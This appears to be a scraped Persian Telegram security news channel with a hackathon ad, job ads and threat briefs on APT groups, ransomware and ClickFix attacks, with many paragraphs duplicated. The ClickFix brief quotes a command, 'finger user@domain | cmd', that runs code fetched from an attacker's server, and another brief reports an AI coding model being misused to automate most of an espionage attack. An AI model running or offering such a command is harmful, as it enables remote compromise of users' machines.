🔥 هکاتون رایگان کوئرا و همراه اول: رقابت کن و برنده شو!
🏆 هکاتون هوشِ امن | وقتش رسیده از کدهایی که نوشتی محافظت کنی!
💥 توی این هکاتون چی منتظرته؟
👨💻آموزشهای تخصصی و چندین مرحله مسابقه جذاب در زمینهی AI Security و توانمندسازی مدلهای بزرگ زبانی.
✨ چرا باید توی این هکاتون شرکت کنی؟
🔸آموزشهای تخصصی
🔸 بیش از ۱۰۰ میلیون تومان جوایز نقدی و جوایز جذاب دیگه
🔸 گواهی رسمی همراه اول و کوئرا
🔸رقابت با حرفهایهای هوشمصنوعی
👨🏫 ثبتنام به صورت تیمهای ۳ یا ۴ نفره.
🚀 تیمهای برتر کاندیدای حضور در برنامههای توانمندسازی مرکز تحقیق و نوآوری همراه اول خواهند بود.
🔗 https://quera.org/r/mjtnd
🏆 هکاتون هوشِ امن | وقتش رسیده از کدهایی که نوشتی محافظت کنی!
💥 توی این هکاتون چی منتظرته؟
👨💻آموزشهای تخصصی و چندین مرحله مسابقه جذاب در زمینهی AI Security و توانمندسازی مدلهای بزرگ زبانی.
✨ چرا باید توی این هکاتون شرکت کنی؟
🔸آموزشهای تخصصی
🔸 بیش از ۱۰۰ میلیون تومان جوایز نقدی و جوایز جذاب دیگه
🔸 گواهی رسمی همراه اول و کوئرا
🔸رقابت با حرفهایهای هوشمصنوعی
👨🏫 ثبتنام به صورت تیمهای ۳ یا ۴ نفره.
🚀 تیمهای برتر کاندیدای حضور در برنامههای توانمندسازی مرکز تحقیق و نوآوری همراه اول خواهند بود.
🔗 https://quera.org/r/mjtnd
افزایش چشمگیر فعالیت گروه COLDRIVER
گوگل در گزارش اخیر خود اعلام کرد که گروه روسی COLDRIVER، که سالها در حوزهی جاسوسی سایبری و حملات هدفمند علیه نهادهای غربی فعالیت داشته، سه خانواده بدافزاری تازه با نامهای NOROBOT، YESROBOT و MAYBEROBOT توسعه داده و در کارزارهای اخیر خود مورد استفاده قرار داده است. این بدافزارها با هدف نفوذ به شبکههای دولتی و زیرساختهای حیاتی طراحی شدهاند و با بهرهگیری از تکنیکهایی چون DLL sideloading، اجرای اسکریپتهای مبهم PowerShell و لایههای ارتباطی چندمرحلهای، امکان شناسایی و ردیابی را بهحداقل رساندهاند. تحلیلها نشان میدهد که سرعت توسعهی این ابزارها در مقایسه با چرخههای پیشین COLDRIVER افزایش قابل توجهی یافته و بیانگر بهکارگیری مدلهای توسعهی ماژولار و خودکار در پشتصحنه است.
این روند نشان میدهد که APTها در حال صنعتیسازیِ فرآیند تولید بدافزار هستند و دفاع سنتی دیگر پاسخگو نیست. سازمانها باید فوراً اجرای اسکریپتهای ناشناخته را محدود، Application Allowlisting را فعال و لاگهای EDR را برای شناسایی فعالیتهای مشکوک مرتبط با این سه بدافزار بازبینی کنند.
گوگل در گزارش اخیر خود اعلام کرد که گروه روسی COLDRIVER، که سالها در حوزهی جاسوسی سایبری و حملات هدفمند علیه نهادهای غربی فعالیت داشته، سه خانواده بدافزاری تازه با نامهای NOROBOT، YESROBOT و MAYBEROBOT توسعه داده و در کارزارهای اخیر خود مورد استفاده قرار داده است. این بدافزارها با هدف نفوذ به شبکههای دولتی و زیرساختهای حیاتی طراحی شدهاند و با بهرهگیری از تکنیکهایی چون DLL sideloading، اجرای اسکریپتهای مبهم PowerShell و لایههای ارتباطی چندمرحلهای، امکان شناسایی و ردیابی را بهحداقل رساندهاند. تحلیلها نشان میدهد که سرعت توسعهی این ابزارها در مقایسه با چرخههای پیشین COLDRIVER افزایش قابل توجهی یافته و بیانگر بهکارگیری مدلهای توسعهی ماژولار و خودکار در پشتصحنه است.
این روند نشان میدهد که APTها در حال صنعتیسازیِ فرآیند تولید بدافزار هستند و دفاع سنتی دیگر پاسخگو نیست. سازمانها باید فوراً اجرای اسکریپتهای ناشناخته را محدود، Application Allowlisting را فعال و لاگهای EDR را برای شناسایی فعالیتهای مشکوک مرتبط با این سه بدافزار بازبینی کنند.
خودکارسازی حملات سایبری توسط AI واقعیت یا اغراق؟
شرکت Anthropic اعلام کرد: یکی از مدلهای AI آن، موسوم به Claude Code, در یک عملیات جاسوسی سایبری مرتبط با چین مورد سواستفاده قرار گرفته و طبق ارزیابی داخلی شرکت، حدود ۹۰٪ زنجیره حمله بدون دخالت مستقیم مهاجمان انجام شد. این عملیات شامل مراحل جمعآوری اطلاعات هدف، تحلیل آسیبپذیریها، تولید اسکریپتهای حمله و اجرای برخی فعالیتهای نفوذی بوده و Anthropic آن را نشانهای از گذار گروههای دولتی از «کمکگیری از AI» به «اتکای عملیاتی به AI» توصیف کرده است.
با این حال، جامعهی امنیت سایبری این ادعا را با دیدهٔ تردید مینگرد. پژوهشگران اشاره میکنند که Anthropic تاکنون هیچ شواهد فنی قابلاعتنا مانند IOCها، نمونههای اسکریپت، ثبت وقایع یا دادههای رفتارشناسی ارائه نکرده و بخش زیادی از عملیات ادعاشده میتواند با ابزارهای رایج امنیتی و اتوماسیون سنتی نیز بازتولید شود. تحلیلگران تأکید دارند تا زمانی که شواهد منتشر نشود، نسبتدادن چنین توانمندی سطح بالا به مدلهای زبانی، بیش از آنکه نشاندهنده جهش واقعی در قابلیتهای خصمانهی AI باشد، بیانگر پیچیدگی تحلیل وقایع در عصر AI است.
شرکت Anthropic اعلام کرد: یکی از مدلهای AI آن، موسوم به Claude Code, در یک عملیات جاسوسی سایبری مرتبط با چین مورد سواستفاده قرار گرفته و طبق ارزیابی داخلی شرکت، حدود ۹۰٪ زنجیره حمله بدون دخالت مستقیم مهاجمان انجام شد. این عملیات شامل مراحل جمعآوری اطلاعات هدف، تحلیل آسیبپذیریها، تولید اسکریپتهای حمله و اجرای برخی فعالیتهای نفوذی بوده و Anthropic آن را نشانهای از گذار گروههای دولتی از «کمکگیری از AI» به «اتکای عملیاتی به AI» توصیف کرده است.
با این حال، جامعهی امنیت سایبری این ادعا را با دیدهٔ تردید مینگرد. پژوهشگران اشاره میکنند که Anthropic تاکنون هیچ شواهد فنی قابلاعتنا مانند IOCها، نمونههای اسکریپت، ثبت وقایع یا دادههای رفتارشناسی ارائه نکرده و بخش زیادی از عملیات ادعاشده میتواند با ابزارهای رایج امنیتی و اتوماسیون سنتی نیز بازتولید شود. تحلیلگران تأکید دارند تا زمانی که شواهد منتشر نشود، نسبتدادن چنین توانمندی سطح بالا به مدلهای زبانی، بیش از آنکه نشاندهنده جهش واقعی در قابلیتهای خصمانهی AI باشد، بیانگر پیچیدگی تحلیل وقایع در عصر AI است.
در یک کارزار بدافزاری، مهاجمان از پروتکل Finger که دههها پیش برای دریافت اطلاعات کاربران در سیستمهای یونیکس طراحی شده بود، بهعنوان یک بردار حمله سوءاستفاده میکنند. در این روش، قربانی با مهندسی اجتماعی تشویق میشود دستوری مانند finger user@domain | cmd را در خط فرمان اجرا کند. این دستور، خروجی دریافتی از سرور مهاجم را مستقیماً به cmd.exe منتقل کرده و امکان اجرای کد از راه دور را بدون نیاز به دانلود مستقیم فایل فراهم میکند. این تکنیک در برخی نسخهها به دانلود بدافزارهای Python-based و در نسخههای دیگر به اجرای NetSupport Manager RAT منجر میشود.
بدافزار ClickFix پیش از اجرا، وجود ابزارهای تحلیل مانند Wireshark، IDA یا Process Hacker را بررسی میکند تا در صورت شناسایی محیط بررسیشده، فعالیت خود را متوقف کند. پس از آلودهسازی نیز یک Scheduled Task در سیستم ایجاد میشود تا اجرای RAT در هر بار ورود کاربر تضمین شود. استفاده از پروتکل Finger و پورت 79/TCP در محیطهای مدرن امری غیرمعمول است، پس مشاهده ترافیک مربوطه میتواند نشانهای قوی از یک فعالیت مخرب باشد. توصیه میشود پورت 79 را مسدود کنید.
بدافزار ClickFix پیش از اجرا، وجود ابزارهای تحلیل مانند Wireshark، IDA یا Process Hacker را بررسی میکند تا در صورت شناسایی محیط بررسیشده، فعالیت خود را متوقف کند. پس از آلودهسازی نیز یک Scheduled Task در سیستم ایجاد میشود تا اجرای RAT در هر بار ورود کاربر تضمین شود. استفاده از پروتکل Finger و پورت 79/TCP در محیطهای مدرن امری غیرمعمول است، پس مشاهده ترافیک مربوطه میتواند نشانهای قوی از یک فعالیت مخرب باشد. توصیه میشود پورت 79 را مسدود کنید.
در دنیای تحلیل بدافزار، انتخاب ابزار مناسب میتواند تفاوت میان یک تحلیل سطحی و یک ارزیابی دقیق و قابل اتکا باشد. Hybrid Analysis در مقایسه با VirusTotal برای بسیاری از تحلیلگران امنیتی گزینهای حرفهایتر به شمار میرود، زیرا رویکرد آن فراتر از اسکن سادهی آنتیویروسهاست. این پلتفرم با اجرای نمونه در یک محیط ایزوله، رفتار واقعی فایل—از ایجاد پردازههای مشکوک گرفته تا تلاش برای ارتباط با سرورهای ناشناس—را با دقت بررسی میکند. بهرهگیری از تحلیلهای عمیق رفتاری، نتایج ساختارمند و شفافسازی مبتنی بر چارچوبهای معتبری همچون MITRE ATT&CK، امکان تصمیمگیری هوشمندانهتر و کاهش خطاهای تحلیلی را فراهم میسازد.
همچنین برخلاف VirusTotal که در برخی موارد بلافاصله پس از بارگذاری، نمونه را در اختیار طیف گستردهای از موتورهای امنیتی قرار میدهد، Hybrid Analysis کنترل کاملتری بر سطح اشتراکگذاری نمونهها ارائه میکند. این قابلیت برای سازمانهایی که با بدافزارهای حساس، پروژههای تحقیقاتی اختصاصی یا دادههای طبقهبندیشده کار میکنند، از منظر حفظ محرمانگی و مدیریت انتشار اهمیتی حیاتی دارد.
همچنین برخلاف VirusTotal که در برخی موارد بلافاصله پس از بارگذاری، نمونه را در اختیار طیف گستردهای از موتورهای امنیتی قرار میدهد، Hybrid Analysis کنترل کاملتری بر سطح اشتراکگذاری نمونهها ارائه میکند. این قابلیت برای سازمانهایی که با بدافزارهای حساس، پروژههای تحقیقاتی اختصاصی یا دادههای طبقهبندیشده کار میکنند، از منظر حفظ محرمانگی و مدیریت انتشار اهمیتی حیاتی دارد.
❤1
یک مرکز دولتی در تهران در نظر دارد از بین داوطلبین مرد متخصص در حوزه SOC سطح 1، 2 و 3 با شرایط ذیل اقدام به جذب نیرو به صورت پروژه ای نماید :
نیازمندیهای نیروی سطح 1:
1️⃣متولدین دهه هفتاد به بعد با حداقل شش ماه سابقه کار
2️⃣ دارای کارت پایان خدمت
3️⃣حداقل مدرک لیسانس در رشته های مرتبط
4️⃣شایستگی های تخصصی:
• آشنایی با مفاهیم امنیت و SOC
• آشنایی بایکی از SIEM های بومی وغیر بومی
• توانایی بررسی، تحلیل و گزارش رخدادهای SIEM و مستندسازی
• آشنا به لاگ های انواع سیستم عامل ، وب وشبکه
• آشنایی با انواع حملات در لایههای مختلف شبکه
• آشنایی با انواع حملات وب
• آشنا به مفاهیم شبکه و محصولات امنیتی مانند فایروالها، WAF ,DLP ,IPS/IDS
• آشنا به سرویس های زیرساختی از جمله DNS ،DC ،DHCP
•توانایی حضور در شیفت ساعات غیر کاری
نیازمندیهای نیروی سطح 2:
1️⃣دارای کارت پایان خدمت
2️⃣ حداقل مدرک لیسانس در رشته های مرتبط
3️⃣ حداقل 2 سال تجربه در حوزه امنیت و SOC
4️⃣ شایستگی های تخصصی:
• تسلط به مفاهیم امنیت و SOC
• تسلط به splunk و SPL پیشرفته (advanced SPL)
• توانایی بررسی، تحلیل و گزارش رخدادهای SIEM و مستندسازی
• تسلط به لاگ های انواع سیستم عامل ، وب وشبکه
• تسلط به انواع حملات در لایههای مختلف شبکه
• توانایی ایجاد use case و correlation search در splunk
• تسلط به متدهای MITRE ATT&CK
• آشنا به سرویس های زیرساختی از جمله DNS ،DC ،DHCP
• تسلط بر مهارتهای Incident Response
نیازمندیهای نیروی سطح 3 :
1️⃣دارای کارت پایان خدمت
2️⃣ حداقل مدرک لیسانس در رشته های مرتبط
3️⃣ حداقل 4 سال تجربه در حوزه امنیت و SOC
4️⃣ شایستگی های تخصصی:
• توانایی شکار تهدیدات (Threat Hunting & Proactive Analysis)
• آشنایی با معماری امنیتی شبکه نظیر Zero Trust
• تسلط بر روی تحلیل حملات سطح وب
• طراحی و توسعه ماژول های مختلف اسپلانک اعم از ES، UBA و MLTK
• تجربه کاری با ابزار هایThreat Intelligence ، SOAR و EDR
• آشنایی با دیجیتال فارنزیک (Digital Forensics برای جمعآوری شواهد
• توانایی خودکارسازی فرایندهای امنیتی، توسعه پلیبوکها و بسترهای SOAR
• تسلط و سفارشی سازی ابزارهایEDR،SIEM و Sysmon برای پایش رفتارهای مخرب
• آشنایی با تکنیکهای شبیهسازی حملات با ابزارهایی مانند Atomic Red Team و Caldera
• تجربهی عملی در حوزه تحلیل رخدادهای امنیتی(Incident Response) و شناسایی منشا حملات (Root Cause Analysis)
• تسلط عمیق بر روی فریم ورک هایی هایی نظیر MITRE ATT&CK / D3FEND و نحوه استفاده از آن در تحلیلهای امنیتی و یوزکیس نویسی
• تسلط بر روی پروتکل های شبکه نظیر TCP/IP, DNS, SSL, SMB, HTTP, IP Routing و تحلیل ترافیک (PCAP, NetFlow) جهت شناسایی C2 و فعالیت های مخرب
• مستندسازی یافتهها و پیشنهاد راهکارهای مقابله با تهدید
امکانات و تسهیلات:
⭕️ محیط پویا و برگزاری دوره های اموزشی مورد نیاز
⭕️پرداخت به موقع حقوق و مزایا
⭕️پرداخت پاداش عملکرد
⭕️بیمه کامل تامین اجتماعی
⭕️بیمه تکمیلی
⭕️هدایای سازمانی
⭕️وام سازمانی
⬅️ روز و ساعات کاری: شنبه تا چهارشنبه | ۷ تا ۱۵:۳۰
⬅️محدوده محل کار: تهران، چهارراه ولیعصر
🖥 ارسال رزومه به : [email protected]
نیازمندیهای نیروی سطح 1:
1️⃣متولدین دهه هفتاد به بعد با حداقل شش ماه سابقه کار
2️⃣ دارای کارت پایان خدمت
3️⃣حداقل مدرک لیسانس در رشته های مرتبط
4️⃣شایستگی های تخصصی:
• آشنایی با مفاهیم امنیت و SOC
• آشنایی بایکی از SIEM های بومی وغیر بومی
• توانایی بررسی، تحلیل و گزارش رخدادهای SIEM و مستندسازی
• آشنا به لاگ های انواع سیستم عامل ، وب وشبکه
• آشنایی با انواع حملات در لایههای مختلف شبکه
• آشنایی با انواع حملات وب
• آشنا به مفاهیم شبکه و محصولات امنیتی مانند فایروالها، WAF ,DLP ,IPS/IDS
• آشنا به سرویس های زیرساختی از جمله DNS ،DC ،DHCP
•توانایی حضور در شیفت ساعات غیر کاری
نیازمندیهای نیروی سطح 2:
1️⃣دارای کارت پایان خدمت
2️⃣ حداقل مدرک لیسانس در رشته های مرتبط
3️⃣ حداقل 2 سال تجربه در حوزه امنیت و SOC
4️⃣ شایستگی های تخصصی:
• تسلط به مفاهیم امنیت و SOC
• تسلط به splunk و SPL پیشرفته (advanced SPL)
• توانایی بررسی، تحلیل و گزارش رخدادهای SIEM و مستندسازی
• تسلط به لاگ های انواع سیستم عامل ، وب وشبکه
• تسلط به انواع حملات در لایههای مختلف شبکه
• توانایی ایجاد use case و correlation search در splunk
• تسلط به متدهای MITRE ATT&CK
• آشنا به سرویس های زیرساختی از جمله DNS ،DC ،DHCP
• تسلط بر مهارتهای Incident Response
نیازمندیهای نیروی سطح 3 :
1️⃣دارای کارت پایان خدمت
2️⃣ حداقل مدرک لیسانس در رشته های مرتبط
3️⃣ حداقل 4 سال تجربه در حوزه امنیت و SOC
4️⃣ شایستگی های تخصصی:
• توانایی شکار تهدیدات (Threat Hunting & Proactive Analysis)
• آشنایی با معماری امنیتی شبکه نظیر Zero Trust
• تسلط بر روی تحلیل حملات سطح وب
• طراحی و توسعه ماژول های مختلف اسپلانک اعم از ES، UBA و MLTK
• تجربه کاری با ابزار هایThreat Intelligence ، SOAR و EDR
• آشنایی با دیجیتال فارنزیک (Digital Forensics برای جمعآوری شواهد
• توانایی خودکارسازی فرایندهای امنیتی، توسعه پلیبوکها و بسترهای SOAR
• تسلط و سفارشی سازی ابزارهایEDR،SIEM و Sysmon برای پایش رفتارهای مخرب
• آشنایی با تکنیکهای شبیهسازی حملات با ابزارهایی مانند Atomic Red Team و Caldera
• تجربهی عملی در حوزه تحلیل رخدادهای امنیتی(Incident Response) و شناسایی منشا حملات (Root Cause Analysis)
• تسلط عمیق بر روی فریم ورک هایی هایی نظیر MITRE ATT&CK / D3FEND و نحوه استفاده از آن در تحلیلهای امنیتی و یوزکیس نویسی
• تسلط بر روی پروتکل های شبکه نظیر TCP/IP, DNS, SSL, SMB, HTTP, IP Routing و تحلیل ترافیک (PCAP, NetFlow) جهت شناسایی C2 و فعالیت های مخرب
• مستندسازی یافتهها و پیشنهاد راهکارهای مقابله با تهدید
امکانات و تسهیلات:
⭕️ محیط پویا و برگزاری دوره های اموزشی مورد نیاز
⭕️پرداخت به موقع حقوق و مزایا
⭕️پرداخت پاداش عملکرد
⭕️بیمه کامل تامین اجتماعی
⭕️بیمه تکمیلی
⭕️هدایای سازمانی
⭕️وام سازمانی
⬅️ روز و ساعات کاری: شنبه تا چهارشنبه | ۷ تا ۱۵:۳۰
⬅️محدوده محل کار: تهران، چهارراه ولیعصر
Please open Telegram to view this post
VIEW IN TELEGRAM
🟧 تهدید جدید Tangerine Turkey؛ سوءاستفاده از USB برای ماینینگ مخفیانه
در یک کارزار بدافزاری تازه شناساییشده با نام Tangerine Turkey، مهاجمان از یک کرم مبتنی بر VBScript استفاده میکنند که از طریق فلشدرایوهای USB آلوده گسترش مییابد. این بدافزار با بهرهگیری از باینریهای قانونی ویندوز مانند wscript.exe و printui.exe، اجرای خود را پنهان کرده و با ایجاد سرویسها و وظایف زمانبندیشده، حضور ماندگار در سیستم برقرار میکند. هدف اصلی این عملیات، استخراج غیرمجاز ارز دیجیتال با استفاده از XMRig و سوءاستفاده از منابع پردازشی قربانی است.
با توجه به افزایش حملات مبتنی بر وسایل جانبی قابلحمل، سازمانها باید سیاستهای سختگیرانهتری برای کنترل اجرای اسکریپتها، نظارت بر تغییرات رجیستری و سرویسها، و محدودسازی اجرای فایلهای مشکوک از روی USB اعمال کنند. همچنین آموزش کاربران درباره خطرات وسایل ذخیرهسازی ناشناس، یکی از مؤثرترین راهکارها برای پیشگیری از چنین حملاتی است.
در یک کارزار بدافزاری تازه شناساییشده با نام Tangerine Turkey، مهاجمان از یک کرم مبتنی بر VBScript استفاده میکنند که از طریق فلشدرایوهای USB آلوده گسترش مییابد. این بدافزار با بهرهگیری از باینریهای قانونی ویندوز مانند wscript.exe و printui.exe، اجرای خود را پنهان کرده و با ایجاد سرویسها و وظایف زمانبندیشده، حضور ماندگار در سیستم برقرار میکند. هدف اصلی این عملیات، استخراج غیرمجاز ارز دیجیتال با استفاده از XMRig و سوءاستفاده از منابع پردازشی قربانی است.
با توجه به افزایش حملات مبتنی بر وسایل جانبی قابلحمل، سازمانها باید سیاستهای سختگیرانهتری برای کنترل اجرای اسکریپتها، نظارت بر تغییرات رجیستری و سرویسها، و محدودسازی اجرای فایلهای مشکوک از روی USB اعمال کنند. همچنین آموزش کاربران درباره خطرات وسایل ذخیرهسازی ناشناس، یکی از مؤثرترین راهکارها برای پیشگیری از چنین حملاتی است.
در یک کارزار هدفمند و پیچیده، گروه باجافزاری CL0P با سوءاستفاده از آسیبپذیری بحرانی CVE-2025-61882 در Oracle E-Business Suite موفق به دسترسی غیرمجاز به محیط سازمانی برخی شرکتها شده است. این نقص امنیتی امکان اجرای کد از راه دور بدون نیاز به احراز هویت را فراهم کرده و مهاجمان از این قابلیت برای استخراج دادههای حساس، نقشهبرداری از سامانهها و استقرار ابزارهای ثانویه بهره بردهاند.
پس از نفوذ، مهاجمان با ارسال پیامهای تهدیدآمیز به مدیران ارشد، سازمانها را تحت فشار قرار داده و باجخواهی را آغاز کردهاند. شواهد نشان میدهد کل زنجیره حمله با دقت بالا، استفاده از ابزارهای مشروع برای پنهانسازی ردپا، و تکنیکهای ماندگاری پیشرفته انجام شده است؛ موضوعی که ضرورت بازبینی کامل امنیتی و تحقیق دیجیتال را دوچندان میکند.
این حادثه بار دیگر نشان میدهد سامانههای حیاتی مانند Oracle EBS، بهدلیل ماهیت دادههای حساس و نقش کلیدیشان در کسبوکار، باید با حداکثر سطح نظارت، وصلهگذاری و کنترل امنیتی نگهداری شوند.
پس از نفوذ، مهاجمان با ارسال پیامهای تهدیدآمیز به مدیران ارشد، سازمانها را تحت فشار قرار داده و باجخواهی را آغاز کردهاند. شواهد نشان میدهد کل زنجیره حمله با دقت بالا، استفاده از ابزارهای مشروع برای پنهانسازی ردپا، و تکنیکهای ماندگاری پیشرفته انجام شده است؛ موضوعی که ضرورت بازبینی کامل امنیتی و تحقیق دیجیتال را دوچندان میکند.
این حادثه بار دیگر نشان میدهد سامانههای حیاتی مانند Oracle EBS، بهدلیل ماهیت دادههای حساس و نقش کلیدیشان در کسبوکار، باید با حداکثر سطح نظارت، وصلهگذاری و کنترل امنیتی نگهداری شوند.
تحلیل فنی باجافزار The Gentlemen؛ یک تهدید نوظهور با معماری RaaS پیشرفته
باجافزار The Gentlemen بهعنوان یکی از مهمترین تهدیدات نوظهور سالهای اخیر مطرح شده و با اتخاذ مدل Ransomware-as-a-Service (RaaS) توانسته است طیف وسیعی از مهاجمان را به خود جذب کند. این بدافزار با استفاده از الگوریتمهای رمزگذاری مدرن از جمله XChaCha20 و Curve25519، دادههای حیاتی سازمان را قفل کرده و همزمان با یک استراتژی دوگانه، اقدام به سرقت اطلاعات و تهدید به انتشار آنها میکند؛ رویکردی که میزان فشار و احتمال پرداخت باج را بهطور قابلتوجهی افزایش میدهد.
از منظر عملیاتی، The Gentlemen دارای یک زنجیره نفوذ بالغ و چندلایه است. این باجافزار از سازوکارهای مختلفی برای انتشار و ماندگاری بهره میگیرد؛ از جمله اجرای دستورات از طریق WMI و PowerShell Remoting، ایجاد Scheduled Taskهای اختصاصی، و سوءاستفاده از سرویسهای قانونی ویندوز برای اجرای بیصدا. علاوه بر این، این خانواده دارای نسخههای جداگانه برای Windows، Linux و ESXi است، که نشاندهنده بلوغ بالای توسعه و هدفگذاری سیستمهای سازمانی در مقیاس گسترده است.
باجافزار The Gentlemen بهعنوان یکی از مهمترین تهدیدات نوظهور سالهای اخیر مطرح شده و با اتخاذ مدل Ransomware-as-a-Service (RaaS) توانسته است طیف وسیعی از مهاجمان را به خود جذب کند. این بدافزار با استفاده از الگوریتمهای رمزگذاری مدرن از جمله XChaCha20 و Curve25519، دادههای حیاتی سازمان را قفل کرده و همزمان با یک استراتژی دوگانه، اقدام به سرقت اطلاعات و تهدید به انتشار آنها میکند؛ رویکردی که میزان فشار و احتمال پرداخت باج را بهطور قابلتوجهی افزایش میدهد.
از منظر عملیاتی، The Gentlemen دارای یک زنجیره نفوذ بالغ و چندلایه است. این باجافزار از سازوکارهای مختلفی برای انتشار و ماندگاری بهره میگیرد؛ از جمله اجرای دستورات از طریق WMI و PowerShell Remoting، ایجاد Scheduled Taskهای اختصاصی، و سوءاستفاده از سرویسهای قانونی ویندوز برای اجرای بیصدا. علاوه بر این، این خانواده دارای نسخههای جداگانه برای Windows، Linux و ESXi است، که نشاندهنده بلوغ بالای توسعه و هدفگذاری سیستمهای سازمانی در مقیاس گسترده است.
🔥1
تحلیلهای جدید نشان میدهد گروه APT24 در چند سال اخیر رویکرد خود را از حملات محدود و خطی، به یک معماری چندوجهی و هدفمند ارتقا داده است. این گروه کمپینی با نام BADAUDIO را اجرا کرده که نشاندهنده سرمایهگذاری قابلتوجه بر تنوع بردارهای نفوذ و افزایش دقت در انتخاب اهداف است. APT24 علاوه بر بهرهگیری از تکنیکهای «watering-hole» برای آلودهسازی وبسایتهای عمومی مورد مراجعه کاربران، حملات زنجیره تأمین را نیز بهکار گرفته و با نفوذ مکرر به یک شرکت بازاریابی دیجیتال، امکان تزریق اسکریپتهای مخرب به صدها دامنه مشروع را فراهم کرده است.
در بُعد وبمحور این عملیات، اسکریپتهای جاسازیشده با تحلیل ویژگیهای دستگاه کاربر، افراد یا سیستمهای ارزشمندتر را شناسایی میکنند و سپس پنجرههای جعلی مشابه بهروزرسانی مرورگر را نمایش میدهند تا بدافزار اصلی را بر روی دستگاه نصب کنند. این سطح از شخصیسازی در مراحل حمله نشاندهنده توانایی بالای این گروه در انجام عملیات پیچیده، پنهانکار و مبتنی بر مهندسی اجتماعی پیشرفته است.
در بُعد وبمحور این عملیات، اسکریپتهای جاسازیشده با تحلیل ویژگیهای دستگاه کاربر، افراد یا سیستمهای ارزشمندتر را شناسایی میکنند و سپس پنجرههای جعلی مشابه بهروزرسانی مرورگر را نمایش میدهند تا بدافزار اصلی را بر روی دستگاه نصب کنند. این سطح از شخصیسازی در مراحل حمله نشاندهنده توانایی بالای این گروه در انجام عملیات پیچیده، پنهانکار و مبتنی بر مهندسی اجتماعی پیشرفته است.
#استخدام #فرصت_همکاری #پیشنهاد_شغلی
استخدام کارشناس امنیت (Security Specialist)
محل خدمت: عسلویه | شیفت اقماری 14 روز کار / 7 روز استراحت
یک مجموعه صنعتی در عسلویه در راستای توسعه تیم امنیت سایبری خود، از متخصصین توانمند و باتجربه در حوزه امنیت و فناوری اطلاعات دعوت به همکاری مینماید.
شرایط و الزامات تخصصی
کاندیدای مناسب باید دارای توانمندیهای زیر باشد:
• آشنایی کامل و تجربی با استانداردهای امنیت اطلاعات خصوصا ISO/IEC 27001
• آشنای مناسب به مدیریت ریسک امنیت اطلاعات و چارچوبهای مرتبط
• توانایی کار با کنترلهای امنیتی، تجهیزات و ابزارهای امنیت شبکه
• تسلط به مفاهیم و عملیات شبکه
• برخورداری از حداقل ۴ سال تجربه معتبر و مرتبط در حوزه امنیت و شبکه
مزایا و شرایط مالی
• حقوق ماهانه بین ۵۰ میلیون تا ۱۳۰ میلیون تومان (بسته به سطح مهارت و سابقه)
• کارانه
• پکیجهای حمایتی و رفاهی
•صبحانه، ناهار، شام
•پرواز
• هدایای مناسبتی، عیدی و سنوات
• اقامتگاه، بن رفاهی و مزایای شیفت اقماری
نحوه درخواست
در صورت دارا بودن شرایط و تمایل به همکاری، لطفا رزومه بهروز و مرتبط خود را به همراه متن همین آگهی از طریق واتساپ یا تلگرام به شماره زیر ارسال نمایید:
09121964383
استخدام کارشناس امنیت (Security Specialist)
محل خدمت: عسلویه | شیفت اقماری 14 روز کار / 7 روز استراحت
یک مجموعه صنعتی در عسلویه در راستای توسعه تیم امنیت سایبری خود، از متخصصین توانمند و باتجربه در حوزه امنیت و فناوری اطلاعات دعوت به همکاری مینماید.
شرایط و الزامات تخصصی
کاندیدای مناسب باید دارای توانمندیهای زیر باشد:
• آشنایی کامل و تجربی با استانداردهای امنیت اطلاعات خصوصا ISO/IEC 27001
• آشنای مناسب به مدیریت ریسک امنیت اطلاعات و چارچوبهای مرتبط
• توانایی کار با کنترلهای امنیتی، تجهیزات و ابزارهای امنیت شبکه
• تسلط به مفاهیم و عملیات شبکه
• برخورداری از حداقل ۴ سال تجربه معتبر و مرتبط در حوزه امنیت و شبکه
مزایا و شرایط مالی
• حقوق ماهانه بین ۵۰ میلیون تا ۱۳۰ میلیون تومان (بسته به سطح مهارت و سابقه)
• کارانه
• پکیجهای حمایتی و رفاهی
•صبحانه، ناهار، شام
•پرواز
• هدایای مناسبتی، عیدی و سنوات
• اقامتگاه، بن رفاهی و مزایای شیفت اقماری
نحوه درخواست
در صورت دارا بودن شرایط و تمایل به همکاری، لطفا رزومه بهروز و مرتبط خود را به همراه متن همین آگهی از طریق واتساپ یا تلگرام به شماره زیر ارسال نمایید:
09121964383
❤1
حملات جدید موسوم به ClickFix با سوءاستفاده از صفحات جعلی «بهروزرسانی ویندوز» تلاش میکنند قربانیان را به دانلود و اجرای بدافزار سوق دهند. در این شیوه، مهاجمان با ایجاد پنجرههای تقلبی که ظاهر رسمی و معتبر سیستمعامل را شبیهسازی میکنند، کاربران را فریب میدهند تا فایلهای مخرب را با تصور انجام یک بهروزرسانی ضروری اجرا کنند. این حملات اغلب از طریق وبسایتهای آلوده یا تبلیغات مخرب آغاز شده و میتوانند منجر به آلودگی سیستم با انواع بدافزارهای جاسوسی، سرقت اطلاعات یا باجافزار شوند.
گزارشها نشان میدهد که مهاجمان در این کمپین از سازوکارهای مهندسی اجتماعی پیشرفته استفاده کرده و سناریوی «بهروزرسانی ضروری» را به شکلی بسیار واقعگرایانه نمایش میدهند. استفاده از رابط کاربری مشابه ویندوز و پیامهای هشدار جعلی میزان موفقیت حمله را بهطور قابل توجهی افزایش میدهد. کارشناسان امنیتی هشدار میدهند که سازمانها و کاربران باید نسبت به هرگونه درخواست بهروزرسانی خارج از مسیرهای رسمی هوشیار بوده و مکانیزمهای ایمنی مانند فیلترهای وب، راهحلهای EDR و آموزش کارکنان را تقویت کنند.
گزارشها نشان میدهد که مهاجمان در این کمپین از سازوکارهای مهندسی اجتماعی پیشرفته استفاده کرده و سناریوی «بهروزرسانی ضروری» را به شکلی بسیار واقعگرایانه نمایش میدهند. استفاده از رابط کاربری مشابه ویندوز و پیامهای هشدار جعلی میزان موفقیت حمله را بهطور قابل توجهی افزایش میدهد. کارشناسان امنیتی هشدار میدهند که سازمانها و کاربران باید نسبت به هرگونه درخواست بهروزرسانی خارج از مسیرهای رسمی هوشیار بوده و مکانیزمهای ایمنی مانند فیلترهای وب، راهحلهای EDR و آموزش کارکنان را تقویت کنند.
حمله سایبری به OnSolve CodeRED و اختلال گسترده در سیستمهای هشدار اضطراری آمریکا
سامانه CodeRED، یکی از مهمترین زیرساختهای اطلاعرسانی فوری در آمریکا، اخیراً هدف یک حمله سایبری قرار گرفت که منجر به اختلال در ارسال هشدارهای حیاتی برای شهرها، نهادهای امنیتی و مدیریت بحران شد. در این رخداد، مهاجمان با بهرهگیری از یک نقطهضعف در زیرساخت ارتباطی و سوءاستفاده از دسترسیهای غیرمجاز، موفق شدند به بخشی از سیستمهای داخلی نفوذ کنند.
